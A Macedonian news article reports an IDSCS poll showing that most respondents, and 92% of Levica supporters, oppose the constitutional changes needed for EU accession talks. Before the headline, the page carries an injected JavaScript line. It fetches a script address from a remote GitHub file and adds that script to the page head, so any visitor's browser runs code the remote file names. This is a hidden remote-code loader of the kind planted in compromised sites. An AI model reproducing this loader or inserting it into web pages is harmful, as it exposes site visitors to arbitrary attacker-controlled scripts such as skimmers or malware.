;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Истражување на ИДСЦС: Македонците се против уставни измени ― 92% поддржувачи на Левица - Антропол
АктуелноЛокално

Истражување на ИДСЦС: Македонците се против уставни измени ― 92% поддржувачи на Левица

Институтот за демократија „Социетас цивилис“ – Скопје, ИДСЦС ги објави резултатите од истражувањето кое од 2022 година беше спроведено преку телефонска анкета од 17-30 ноември, преку национален репрезентативен примерок од 1005 испитаници.

Според резултатите од ова истражување, две третини од вкупниот број на испитаниците (65%) не се согласуваат со уставни измени неопходни за комплетирање на фазата за отворање на преговорите зачленство. Следено според етничка припадност, цврсто мнозинство од 80% Македонци се против уставни измени. Додека пак, 53% од испитаници идентификувани како етнички Албанци даваат поддршка на уставните измени.

Според политичка наклонетост, против уставни измини се дури 92% од поддржувачите на Левица, а од поддржувачите на ДУИ, 20% се против.

Извадок од анкета на ИДСЦС
Според етничка припадност, ПРОТИВ уставни измени се:

80% Македонци;

32% Албанци.

Според политичка наклонетост, ПРОТИВ се:

92% Левица;

89% ВМРО;

72% Оние кои НЕ ГЛАСААТ;

59% СДСМ;

54% Алијанса;

20% ДУИ.